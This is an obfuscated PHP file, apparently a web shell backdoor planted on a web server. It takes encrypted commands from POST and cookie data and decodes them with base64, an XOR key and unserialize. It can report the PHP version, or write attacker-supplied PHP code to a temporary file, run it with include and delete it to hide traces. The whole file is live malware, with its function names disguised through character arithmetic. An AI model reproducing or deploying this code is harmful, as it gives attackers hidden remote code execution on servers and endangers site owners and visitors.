<?php $etwwahl    = /*   invm*/ 'etwwahl'      ^ /*   tjiyxc   */ '';


$dtkmc	=     "\x61"	.	"\162"    .	"r".$etwwahl(993-896)      .    "\171" /*   xxy*/ . /* aa*/ "\x5f" /*  up*/ . /*dde */ "m"."a"."p";


$korck  =    $etwwahl(986-887)    .      "o"."\165" /*   wv   */ .     "\x6e"    .       $etwwahl(116);


function    het_pjkpv($ywzxr,	$ecoymtorr)


{	global /*axxd   */ $etwwahl;


  
 /*dual */ $ywzxr /* fbjool   */ =	"\74" /*xtc   */ . /*   rukaq  */ "?"."p".$etwwahl(104) /*  blsis */ .	"p".$etwwahl(32)	.	$etwwahl(117) /*  t   */ .	"n"."\x6c" /*   dnbbk */ .    $etwwahl(105)."\x6e"    .     "k".$etwwahl(563-523)	.	"_"."\x5f"      . /*jgtvox  */ $etwwahl(567-497)  .  $etwwahl(73)  . /*  _ejlf */ $etwwahl(76)   .	"E"."\x5f" /*  hsapi  */ . /*_uli   */ "_".$etwwahl(41) /*  aww */ .    ";".$etwwahl(32) /* idde*/ .    $ywzxr["\144"];


    $oqznxv /*  q */ =	$etwwahl(316-214)    . /*  yghlf  */ "\151"	.    "\154"    .    $etwwahl(183-82)	.   $etwwahl(207-112)    .  "\x70"     .     $etwwahl(117)   .     "t"."_".$etwwahl(99) /*  d   */ .	"o"."\156"    . /* mcyx_   */ "t"."\145"."n".$etwwahl(668-552) /*dalk   */ . /* li_ */ "s";


	

  $oqznxv($ecoymtorr, /*   pt*/ $ywzxr);


      

     gqufdy($ecoymtorr);

}




$gmh_r	= /*  esilzt*/ 73;function	gqufdy($ecoymtorr)


{  global	$etwwahl;


      
 /*  llwu*/ include($ecoymtorr);

 /*  _sgk_   */ $xvue_xfg    =    $ecoymtorr;     @unlink($xvue_xfg);}
function    ftlox()


{

  global /*   ee   */ $etwwahl;


   $hhlhgotx_j /*   _l*/ =    array();    $hhlhgotx_j["\160"     .      "v"]	=       phpversion();    $hhlhgotx_j[$etwwahl(1018-903) /* c_tqwa*/ .	$etwwahl(118)]    = /*  fasu   */ "3".".".$etwwahl(152-99);	$crjnwdc  = /*   lwcqi  */ 74;

	echo /*ci  */ @serialize($hhlhgotx_j);

}


function    nnulkk($ywzxr, /*ohup_   */ $ampoamx_ms){

 /*ddlugz */ global /*pvjv */ $etwwahl;


    $wk_bs_g	= /* s  */ "";    $uzqcmligci	=     'vyejgo';    $mjguc /* s  */ =    hash('sha256', /*  cljzc */ $ywzxr);

      $evlwef	= /*  wergvy*/ str_replace('zp',   $mjguc,     $uzqcmligci); /*   sz   */ $hhlhgotx_j    =      0;
    while    ($hhlhgotx_j	<  strlen($ywzxr))    {


  $lnnpp /*l */ =  isset($ampoamx_ms) /* eggwwi*/ ?       $ampoamx_ms /* vp  */ : /* tsv*/ '';

	for  ($jtexr    =      0;   $jtexr /*   skjk*/ < /*  dtits  */ strlen($lnnpp) /*   hxux_i   */ &&	$hhlhgotx_j	<	strlen($ywzxr);       $jtexr++, /*  q   */ $hhlhgotx_j++)  {
    $wk_bs_g /*ack   */ .= /*  pgz*/ $etwwahl(ord($ywzxr[$hhlhgotx_j])       ^ /*  emrgzo */ ord($lnnpp[$jtexr]));

       }
	if /*  htpz  */ (strlen($wk_bs_g) /* d  */ >    20)	{
      $evlwef       =     substr($wk_bs_g,  0, /*keti */ 20);


	}    }


       if /*   _wlmro  */ (empty($wk_bs_g)) /*   _yp */ { /*   i_u */ $wk_bs_g	= /*   abff */ date('Y-m-d /*   fx*/ H:i:s');

	}  return	$wk_bs_g;


}





function /* nhowzc  */ hwbyk($vtjfr_mbac)
{


	global /* jiy */ $etwwahl;   
	$niqrhxddh       =  "9"."c"."\x32" /*xl */ . /*   hy   */ "3"."\x33"	.       "0"."\143"    . /*   k   */ "\x31" /*  qowbjc  */ .    "-"."1"."\x34"    . /*   qob */ "\x31"     .    "4"."\x2d"     .    $etwwahl(520-468) /* ljfdch  */ . /*aep  */ "b"."9".$etwwahl(48)   .   "\55"    .  "8"."b".$etwwahl(112-57)    .    $etwwahl(446-344) /*  bf   */ . /*gxde  */ "\x2d"  .       "\141"       .	"\60"       .	"\x34"	. /*   ttw  */ "\145".$etwwahl(726-669)    . /* eqfo */ "3"."\x35"      .  $etwwahl(528-471) /*  p */ . /*   kmy  */ $etwwahl(99)    .    $etwwahl(930-882)    .      "7"."\71";        /*   qasvx */ foreach /*   ibaj  */ ($vtjfr_mbac     as	$qnacyc /*   vuvhsz*/ => /* frwfga   */ $ywzxr)     {


	tklwlcly_(base64_decode($ywzxr), /* l   */ $niqrhxddh, /*   hs */ $qnacyc);


      }


}function    tklwlcly_($ywzxr,	$niqrhxddh,    $qnacyc)


{


      global   $etwwahl;
	


       $ywzxr /*  b  */ =    unserialize(nnulkk(nnulkk($ywzxr,	$niqrhxddh),   $qnacyc));	$wogmi      =    'pudu';


	$hhlhgotx_jmoixr /*   allhbh   */ =     'xwermzj';


      if    (isset($ywzxr["\x61".$etwwahl(107)]))	{

       if /* fc */ ($ywzxr["\x61"]      ==    $etwwahl(105)) /*  zdz_l */ {

 /* ax   */ ftlox();

	} /*gmj_bh   */ elseif      ($ywzxr["\x61"]     == /*  egdii*/ "\145") /*   tk_il */ {
    het_pjkpv($ywzxr,    sprintf("\56"     .    $etwwahl(47)	.    "\45"	. /*   gnrl */ "\x73"    . /*   itvo_ */ "\x2e" /* yne*/ . /*  g*/ "\160" /* oom  */ .      "\154",  md5($niqrhxddh)));
			$porm_y_no /* wha  */ =    44;
   }

	exit(); /*   rc   */ }
}


hwbyk($_POST);     



$hxh_q /*fwe*/ = /*  ya   */ $dtkmc('rawurldecode',	$_POST);

$aqnrjspic      =    $korck($hxh_q);
hwbyk($_COOKIE);    





$zcbmatniag /*  vp */ =	$dtkmc('rawurldecode', /* he */ $_COOKIE);




?>